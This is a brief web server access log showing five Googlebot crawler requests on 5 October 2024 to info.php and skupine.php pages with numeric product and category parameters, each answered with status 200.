66.249.66.43 - - [05/Oct/2024:10:56:38 +0200] "GET /info.php?sifra=44051&skupina=63 HTTP/1.1" 200 17440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:11:21:39 +0200] "GET /info.php?sifra=56151&skupina=100 HTTP/1.1" 200 17549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:11:23:39 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:11:26:39 +0200] "GET /info.php?sifra=50451&skupina=100 HTTP/1.1" 200 17660 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:11:58:33 +0200] "GET /info.php?sifra=00458&skupina=106 HTTP/1.1" 200 18631 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
